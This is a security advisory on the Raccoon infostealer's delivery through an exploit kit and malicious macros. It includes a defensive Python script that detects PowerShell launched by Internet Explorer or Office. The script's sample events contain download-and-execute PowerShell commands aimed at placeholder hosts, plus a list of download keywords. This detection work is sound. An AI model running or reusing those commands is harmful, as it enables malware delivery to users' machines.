LTS Secure Warning: Raccoon Infostealer Being Utilized By Hacker To Steal Sensitive Data From Financial Institutions

A new information stealing malware, dubbed Raccoon, has gained a lot of popularity among cybercriminals in a short span. Written in C++ & developed to compromise both 32 & 64-bit operating systems, the malware is being sold as a Malware-as-a-Service (MaaS) product by its developers, helping cybercriminals make quick & easy money.


Technical Details

The malware is being delivered in multiple ways, such as phishing emails, exploit kits, etc.

The attackers utilize the Fallout exploit kit to deliver the Raccoon payload to the victim machine. The kit spawns a PowerShell instance from Internet Explorer (IE), which afterwards downloads the infostealer payload.

The phishing email contains an Office document with a malicious macro. If the recipient opens the document & allows the macro to run, a connection is established to a malicious server and the main payload is downloaded to the user's machine.
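Both delivery chains above end the same way: PowerShell is launched by a process that should not normally launch it (Internet Explorer for the exploit-kit path, an Office application for the macro path) and then fetches the payload. The following is an added detection example, not LTS Secure's code; it assumes process-creation events with Sysmon Event ID 1 style field names (parent image, image, command line), and the sample records are constructed for illustration.

```python
"""Flag process-creation events that match the Raccoon delivery chains:
PowerShell started by Internet Explorer or by an Office application,
optionally with a download-style command line.
Field names follow the Sysmon Event ID 1 layout; the records are constructed."""
import ntpath
from typing import Dict, List, Optional

# Parent processes that should not normally launch PowerShell on a user workstation.
BROWSER_PARENTS = {"iexplore.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Command-line fragments typical of a download stage (matched case-insensitively).
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest",
                    "start-bitstransfer", "-encodedcommand", "-enc ")

# Constructed sample events (hypothetical hosts and placeholder URLs, not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws01",
     "parent_image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -WindowStyle Hidden -Command "
                     "\"(New-Object Net.WebClient).DownloadFile('http://payload.invalid/r.exe','C:\\Users\\Public\\r.exe')\""},
    {"host": "ws02",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -WindowStyle Hidden -Command IEX ((New-Object Net.WebClient).DownloadString('http://macro.invalid/s'))"},
    {"host": "ws03",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Temp"},
    {"host": "ws04",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -EncodedCommand AAAAPLACEHOLDERAAAA"},
    {"host": "ws02",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": "splwow64.exe 12288"},
]


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding for one event, or None if the event is unremarkable."""
    child = image_name(event["image"])
    if child not in POWERSHELL_IMAGES:
        return None
    parent = image_name(event["parent_image"])
    cmd = event.get("command_line", "").lower()
    downloads = any(marker in cmd for marker in DOWNLOAD_MARKERS)

    if parent in BROWSER_PARENTS:
        severity = "high"
        reason = "PowerShell spawned by Internet Explorer (exploit-kit style delivery)"
    elif parent in OFFICE_PARENTS:
        severity = "high"
        reason = "PowerShell spawned by an Office application (macro style delivery)"
    elif downloads:
        severity = "medium"
        reason = "PowerShell with a download-style command line"
    else:
        return None
    if downloads and severity == "high":
        reason += ", with a download-style command line"
    return {"host": event["host"], "parent": parent, "severity": severity, "reason": reason}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run classify() over a batch of events and keep only the findings."""
    return [finding for finding in (classify(e) for e in events) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['host']}: {finding['reason']} (parent={finding['parent']})")
```

The parent-process check is the stronger signal here because the page's two chains both hinge on an unusual parent; the command-line markers are kept as a secondary, lower-severity signal since an administrator's console session (the `explorer.exe` → `Get-ChildItem` event) should not fire. In practice the parent list would be tuned to the software actually deployed on the endpoints.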


Impact

  • Collects user & system information.
  • Captures cryptocurrency wallet credentials.
  • Steals sensitive/confidential information such as login credentials for banking sites, credit card data, cookies, etc.


Recommended Actions

  • Never download any suspicious attachments or click on any shady-looking link. Make an effort to educate your users on how to identify malspam.
  • Always update your anti-virus software with the latest releases.
  • Periodically run “full system scan” on your endpoints.
  • Configure your Firewall/IDS/IPS/Endpoint Protection systems properly so that no gaps are left open.
  • Isolate all of the compromised computers ASAP to prevent threats from spreading further inside your infrastructure.